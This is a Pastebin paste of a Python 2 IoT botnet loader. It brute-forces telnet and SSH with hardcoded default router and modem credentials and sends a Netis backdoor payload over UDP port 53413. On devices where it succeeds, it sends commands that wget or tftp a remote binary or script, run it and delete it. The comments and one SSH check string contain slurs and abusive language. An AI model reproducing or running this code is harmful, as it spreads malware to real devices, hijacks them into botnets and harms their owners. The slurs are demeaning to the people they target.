API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 27th, 2017
113
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.08 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. """
  3. Ur Mums a Hoe
  4.  
  5. >>>
  6. Need a .lst nigga lulz Iam Not supplying shit
  7.  
  8. """
  9. import threading, sys, time, random, socket, re, os, paramiko
  10. from Queue import *
  11. from sys import stdout
  12.  
  13. if len(sys.argv) < 3:
  14. print "Usage: python "+sys.argv[0]+" <threads> <list>"
  15. sys.exit()
  16.  
  17. # USER AND PASS LISTS #
  18. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  19. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  20. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  21. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  22.  
  23.  
  24. # START CONFIGURATION #
  25. url = "http://0.0.0.0/tftp" # ARM4 Binary
  26. sh = "http://0.0.0.0/bins.sh" # SH File
  27. command = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://0.0.0.0/sshd || tftp -r sshd -g 0.0.0.0; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  28.  
  29. # DONT TOUCH
  30. spawn_shell = "cat | sh"
  31. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  32. threads = int(sys.argv[1])
  33. ips = open(sys.argv[2], "r").readlines()
  34. ports = ["23", "22", "53413"]
  35. queue = Queue()
  36. qcount = 0
  37. binary = url.split("/")
  38. binary = binary[3]
  39. ip = binary[2]
  40. found = 0
  41. count = 0
  42.  
  43. for ip in ips:
  44. qcount += 1
  45. stdout.write("\r[%d] Added to queue" % qcount)
  46. stdout.flush()
  47. queue.put(ip)
  48. print "\n"
  49.  
  50. def readUntil(tn, string, timeout=10):
  51. buf = ''
  52. start_time = time.time()
  53. while time.time() - start_time < timeout:
  54. buf += tn.recv(1024)
  55. time.sleep(0.01)
  56. if string in buf: return buf
  57. raise Exception('TIMEOUT!')
  58.  
  59. def worker():
  60. try:
  61. while True:
  62. try:
  63. if queue.empty() == True:
  64. sys.exit(1)
  65. ip = queue.get()
  66. ss = sssh(ip)
  67. ss.start()
  68. tt = ttelnet(ip)
  69. tt.start()
  70. nn = nnetis(ip)
  71. nn.start()
  72. queue.task_done()
  73. except:
  74. pass
  75. except:
  76. pass
  77.  
  78. class ttelnet(threading.Thread):
  79. def __init__ (self, ip):
  80. threading.Thread.__init__(self)
  81. self.ip = str(ip).rstrip('\n')
  82. def run(self):
  83. try:
  84. tn = socket.socket()
  85. tn.settimeout(5)
  86. tn.connect((self.ip,23))
  87. time.sleep(0.2)
  88. hoho = ''
  89. hoho += readUntil(tn, ":")
  90. if "mdm9625" in hoho:
  91. r00t = 0
  92. username = usernames[1]
  93. password = passwords[1]
  94. tn.send(username + "\n")
  95. elif "9615-cdp" in hoho:
  96. r00t = 1
  97. username = usernames[0]
  98. password = passwords[0]
  99. tn.send(username + "\n")
  100. elif "ogin" in hoho and "9615-cdp" not in hoho:
  101. zte = 1
  102. username = usernames[2]
  103. password = passwords[2]
  104. tn.send(username + "\n")
  105. elif "ogin" in hoho and "mdm9625" not in hoho:
  106. zte = 1
  107. username = usernames[2]
  108. password = passwords[2]
  109. tn.send(username + "\n")
  110. if "(none)" in hoho:
  111. zte = 0
  112. vizxv = 1
  113. username = usernames[3]
  114. password = passwords[3]
  115. tn.send(username + "\n")
  116. if "BCM" in hoho:
  117. zte = 0
  118. vizxv = 0
  119. BCM = 1
  120. username = usernames[1]
  121. password = passwords[1]
  122. tn.send(username + "\n")
  123. except Exception:
  124. tn.close()
  125. try:
  126. hoho = ''
  127. hoho += readUntil(tn, ":")
  128. if "assword" in hoho:
  129. tn.send(password + "\n")
  130. time.sleep(3)
  131. except Exception:
  132. tn.close()
  133. try:
  134. mp = ''
  135. mp += tn.recv(1024)
  136. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  137. if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139. if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  140. if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  141. if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  142. except Exception:
  143. tn.close()
  144. pass
  145.  
  146. class nnetis(threading.Thread):
  147. def __init__ (self, ip):
  148. threading.Thread.__init__(self)
  149. self.ip = str(ip).rstrip('\n')
  150. def run(self):
  151. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  152. try:
  153. # sends netis payload to almost everything lmao
  154. s.sendto(loginpayload, (self.ip, 53413))
  155. time.sleep(1)
  156. s.sendto(commandpayload, (self.ip, 53413))
  157. time.sleep(2)
  158. except Exception:
  159. pass
  160.  
  161. class sssh(threading.Thread):
  162. def __init__ (self, ip):
  163. threading.Thread.__init__(self)
  164. self.ip = str(ip).rstrip('\n')
  165. def run(self):
  166. x = 1
  167. while x != 0:
  168. try:
  169. username='root'
  170. password="0"
  171. port = 22
  172. ssh = paramiko.SSHClient()
  173. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  174. dobreak=False
  175. for passwd in ssh_passwords:
  176. if ":n/a" in passwd:
  177. password=""
  178. else:
  179. password=passwd.split(":")[1]
  180. if "n/a:" in passwd:
  181. username=""
  182. else:
  183. username=passwd.split(":")[0]
  184. try:
  185. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  186. dobreak=True
  187. break
  188. except:
  189. pass
  190. if True == dobreak:
  191. break
  192. badserver=True
  193. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  194. output = stdout.read()
  195. if "nigger" in output:
  196. badserver=False
  197. if badserver == False:
  198. print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  199. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  200. time.sleep(3)
  201. ssh.close()
  202. if badserver == True:
  203. ssh.close()
  204. except:
  205. pass
  206. x = 0
  207.  
  208. for g in xrange(threads):
  209. t = threading.Thread(target=worker)
  210. t.setDaemon(True)
  211. t.start()
  212.  
  213. queue.join()
  214. print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!